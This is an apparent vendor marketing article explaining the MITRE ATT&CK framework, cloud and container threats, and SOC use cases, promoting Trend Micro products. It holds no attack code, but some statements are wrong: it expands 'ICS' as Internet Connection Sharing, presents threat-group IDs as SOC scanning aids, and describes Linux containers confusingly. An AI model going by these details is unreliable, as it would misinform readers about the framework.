MITRE ATT&CK™ is a framework consisting of several tactics to help businesses regain control of their security systems. ATT&CK—short for adversarial tactics, techniques, and common knowledge—is a knowledge base consisting of the different strategies adversaries use to exploit your systems based on observations of real cyber attacks.
MITRE launched the framework in 2013 to “document common TTPs that advanced persistent threats use against Windows enterprise networks.” The corporation gathered information on the various threats plaguing the internet, documenting and classified them based on several categories, called “matrices.” These include sections like Enterprises, Mobile, and Internet Connection Sharing (ICS)—each with several sub-categories.
The framework help organisations understand the behaviours and goals behind each threat. This information is known as TTP, which is short for tactics, techniques, and procedures. Tactics refer to their goals, techniques suggest to the tools or methods used, and procedures describe to the detailed list of actions performed.
When incorporating this structure into your strategy, MITRE ATT&CK can help security analysts answer the following questions:
- What are the goals of the attack?
- Why would adversaries use this approach?
- Which tools and techniques did cyber attackers use for this attack?
- What kinds of user behaviour lead to this attack?
- In which regions are these attacks common?
This data enables security analysts to identify the threat and how to mitigate or eliminate it. MITRE ATT&CK mitigations are specific procedures that security teams can use to deal with each TTP. Each mitigation can be applied to different TTPs.
The relevance of Linux in the cloud
Linux is one of the world’s most popular operating systems (OS). It powers 90% of the public cloud workload as of 2017. Considering its servers’ low cost of ownership and reliability, it’s not surprising that companies prefer to use this technology. Linux is open source, which means developers from across the world can contribute towards improving the system.
As developers gravitated toward Linux over time, the assumption was that their collective ability to mitigate security threats would be higher—making it safer. But, because of this popularity amongst those operating critical public and private systems, threat actors directed their attacks towards Linux systems.
Trend Micro Linux Threat Report 2021 indicated that cyber attackers targeted over 200 vulnerabilities in six months. Some of the most common malware identified were coin miners (24.56%), web shells (19.92%), ransomware (11.55%), and trojans (9.65%). This demonstrates the essentiality of implementing the proper security controls in your organisation—regardless of your operating system of choice.
What is MITRE ATT&CK for containers?
A common gateway to running microservice-based applications in the cloud, containers are essential for cloud infrastructure. Linux containers (LXC) are open source with one or two sets of processes separate from other system components.
Each container serves a specific purpose and helps run an entire application separately from the runtime environment. The fact that they’re independent means that instilling security measures requires teams to protect the entire container pipeline, rather than just the container itself.
MITRE ATT&CK for Containers considers this and provides a single overview of attacks by orchestration and container levels. Because the framework uses real-world data from organisations like Trend Micro, it's considered a solid framework for what to expect and how to mitigate threats.
How to use MITRE ATT&CK effectively
Given its scalability and flexibility, the use of the public cloud is becoming common. This has led businesses to look for tailored recommendations to keep their business-critical applications secure. The MITRE ATT&CK framework for the cloud acts as a foundational tool for achieving this resiliency, as demonstrated by the following examples.
The ATT&CK knowledge base provides insight into potential breaches that can occur across various systems. For cloud-based systems, they collect data for five platforms: Microsoft 365, Microsoft Azure AD, Google Workspace, IaaS, and SaaS. It also has data on different OSes, networks, and containers along with insight into how to protect them. The knowledge base does the heavy lifting for enterprises, so they can focus on securing their systems.
Security operations centre (SOC) teams can use this overview to understand each threat type in detail. SOCs can then implement this within their current frameworks and train incoming and existing team members on how to interpret it.
Using MITRE’s comprehensive and well-classified knowledge base makes identifying threats easier based on their level of risk. Security teams can check current defences and identify issues.
Once MITRE releases data about a new threat, security team can then analyse and test whether current systems have been affected. SOC teams can automate their systems for continuous threat hunting. Based on the data the team gathers, they can conduct various penetration exercises and assess the efficacy of their systems.
After identifying the threat or vulnerability, the SOC requires specific procedures to resolve the issue—as soon as possible. These teams can access ATT&CK information for visibility on how and where the threat originated and its capability of damage. By homing in on the source and potential breach pathway, the SOC can remediate directly at the source. This significantly cuts detection and investigation time, as the team saves on the time necessary to track down background information.
To identify and remediate the issue, SOC teams can use tools and services like Trend Micro Cloud One™ and Trend Micro Vision One™. These solutions use the framework to scan, identify, and mitigate the issue quickly—enabling companies to save between 2,100 and 6,100 hours per year.
Trend Micro Vision One collects security telemetry from multiple sources such as cloud workloads, networks, and email. It correlates all available data to provide context and comprehensive reports on the true nature of the breach. This enables SOC teams to focus in on the remedial measure based on the threat level.
ATT&CK IDs that help the SOC scan for vulnerabilities, including:
- G0007: Enabling teams to perform a large-scale scan to find vulnerable servers
- G0034: Sandworm teams can scan networks for vulnerabilities as part of their operational planning
- G0016: Identifying vulnerabilities that can be exploited in specific networks
- DS0029: Recognizing unusual traffic patterns in a particular network
The main intention of using cybersecurity intelligence is to mitigate potential threats instead of constantly dealing with losses that come from breaches. A recent example can be traced back to a vulnerability uncovered in Apache Log4j, a logging packaging for Java. Used often by enterprise cloud applications, the consequences of an attack were classified as severe.
Despite a patch (only compatible with Java 8) released by Apache, the vulnerability compromised many systems. This led Trend Micro to launch a Log4Shell Vulnerability Assessment Tool to identify it.
The use of threat detection and mitigation tool during these types of events is crucial. Teams are enabled to join other mitigation strategies, such as virtual patching and intrusion detection and prevention systems (IDS/IPS), to quickly detect and eliminate threats.
Preventive rules include:
- Rule 1011242: Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
- Rule 1005177: Restrict Java Bytecode File (Jar/Class) Download
- Rule 1008610: Block Object-Graph Navigation Language (OGNL) Expressions Initiation in Apache Struts HTTP Request
The MITRE ATT&CK framework uses a threat-based defence strategy to improve an organisation’s security posture. Teams can identify gaps in their current security system, also known as a defensive gap assessment.
By testing for the potential to detect, analyse, and respond to threats, SOC teams are able to investigate how well their current systems stack up. In addition, it can be used to test new tools in the market. Tools developed based on the framework, like Trend Micro Vision One, deliver the added benefit of enabling teams to plan and prioritise their company’s investments.
By regularly monitoring your security infrastructure, the SOC can use the observation info to make data-driven decisions on the design and architecture your organisation needs. These decisions are imperative because your entire system relies on the underlying infrastructure to mitigate and remediate threats.
To build more secure systems, teams must map their defensive controls based on the TTPs. MITRE ATT&CK’s terminology can be used as a common reference point during red teaming, purple teaming, or penetration testing—for planning, execution, or reporting. This helps determine your enterprise-wide posture and plan.
As regulatory compliance is a significant undertaking, SOC teams require the right tools to navigate with simplicity. MITRE ATT&CK can be used to map compliance controls and regularly test systems to ensure they are secure and compliant.
Trend Micro Cloud One does this automatically. Since the software is based on the framework, you receive up-to-date data from each control. This informs teams on the compliancy of their system. The Forrester Total Economic Impact survey found that companies spend 50% less time on compliance with Trend Micro Cloud One, while increasing the pace of cloud migration projects by 10%.
Wealth of insight
MITRE ATT&CK is one of the most comprehensive databases available for cybersecurity threats. By constantly updated using real-world data—including everything from threat identification to remediation—MITRE ATT&CK provides a wealth of insight.
To leverage MITRE ATT&CK effectively, the SOC must account for several factors. First, the framework requires teams to properly understand the nature of the various threats present. It’s essential to build a security infrastructure and relevant protocols by drawing on data from the framework, as it helps SOC teams effectively secure their systems. This provides a broad overview of what issues to look out for and when to act. In addition, this needs to be built into an organisation’s current security infrastructure. Setting up systems to identify these threats and protocols will help patch and remediate existing threats.
By using MITRE’s recommended mitigation strategies, SOC teams can ensure they’re using tried and tested methods to block potential threats. Solutions such as Trend Micro Cloud One and Trend Micro Vision One present data in the context of MITRE's framework so that your SOC team can see the big picture.
These products give users a complete overview of their cybersecurity system and built-in protocols to tackle potential breaches—without manual intervention. With MITRE ATT&CK, you can be assured you’re protecting your systems against threats now and in the future.